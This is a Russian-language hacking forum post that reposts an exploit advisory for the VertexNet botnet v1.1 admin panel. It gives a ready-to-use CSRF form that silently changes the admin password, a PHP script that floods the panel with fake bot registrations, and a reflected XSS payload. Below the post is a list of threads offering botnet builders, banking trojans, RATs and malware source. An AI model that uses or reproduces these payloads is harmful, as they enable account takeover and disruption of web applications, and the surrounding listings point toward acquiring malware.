VertexNet botnet v1.1 multi vulnerability

Admin

Администратор
# Date: 3-12-2015
# Exploit Author: alqnas eslam
# Software Link:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


# Тестировалось на: windows и linux

1- csrf change password and setting:

save this code in html file and send it to admin
when he open it the setting will be changed
<body onload="document.alqnas.submit()">
<form action="

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

" method="post" name="alqnas">
<input type="text" name="maxusers" value="15" />
<input type="text" name="userswidth" value="400" />
<input type="text" name="showgeo" value="y" />
<input type="text" name="showoff" value="y" />
<input type="text" name="username" value="admin" />
<input type="text" name="password" value="alqnas" />
<input type="submit" />
</form>
</body>


2- bots flood:

you can do flood bots by this code run it with php

<?php
$i =1;
function adduser($url)
{
$ch = curl_init();

curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$output=curl_exec($ch);
curl_close($ch);
return $output;
}
//400 are numbers you will send it
while ( $i <=400){
$rand = substr( $d , 0 , 5 );
$shuf = substr( $a , 0 , 5 );
$d = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789");
$a = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789");
//change localhost to url of bot
echo adduser("

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

");
$i++;
}
?>

3- cross site scripting (xss)

in file poster.php prametar uid not fillter from html code
so we can do xss attack

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

"><script>alert(/xss/)</script>
 
Похожие темы
B VertexNet Loader v1.2.1 + Tutorial Готовый софт 0
E SAPHIRA - ANDROID BOTNET Готовый софт 0
Clarence Anubis-Banking-Botnet 8.0 Source Code!!! Готовый софт 1
Kalash Интересно APK Botnet набор в команду Предоставляю работу. Ищу специалиста. 0
Kalash Интересно Cerber Botnet Вирусология 8
NickelBlack BOTNET BIBLE V.3 Вирусология 9
NickelBlack LiteHTTP Botnet | Loader | Panel + Builder & Source Code Программирование 6
NickelBlack BlackNET Botnet v3.5 [Stealer+Keylogger+DDOS] Программирование 24
E Android PC Botnet Installs exe,apk Услуги дизайнеров и веб-разработчиков. 0
S Cythosia Botnet v2 [Webpanel + Builder] Готовый софт 0
S Athena HTTP Botnet Builder + Panel v1.0.8 Готовый софт 0
S Zeus Botnet 2.1.0.1 Готовый софт 0
S sms botnet Готовый софт 1
S Parasite HTTP Botnet + All Plugins Готовый софт 0
S Loki Bot 2.0 Android Banker Botnet Готовый софт 3
B BlackNET v1.0.0 Advanced MultiOS BotNET + Secure PHP Panel + Tutorial Готовый софт 0
I BotNet-Master (большой комплект исходников) Программирование 0
T Самописные исходники Botnet'a от 10K Полезные статьи 2
G Android botnet - full инструкция Полезные статьи 3
Traven Android botnet - full инструкция Полезные статьи 1
Traven Android Botnet (Qiwi, SberBank, AlfaBank, Visa, MasterCard) Раздачи и сливы 7
E Zeus Botnet 5.0.0.1 [2017] Уязвимости и взлом 1
АнАлЬнАя ЧуПаКаБрА DiamondFox 4.2.0.650 Обновленный botnet Готовый софт 3
kleenscan Kleenscan.com - AV \ Multi AV Scanner Malware, эксплойты, связки, крипт 13
NickelBlack Multi-Downloader v0.1 - Download & Run File From URL Готовый софт 0
R [CRACKED] Unknown RAT v.1.2.0 Multi-OS Windows Linux Android Mac Готовый софт 1
АнАлЬнАя ЧуПаКаБрА Multi shit tool, Dorks, Proxy Готовый софт 0

Название темы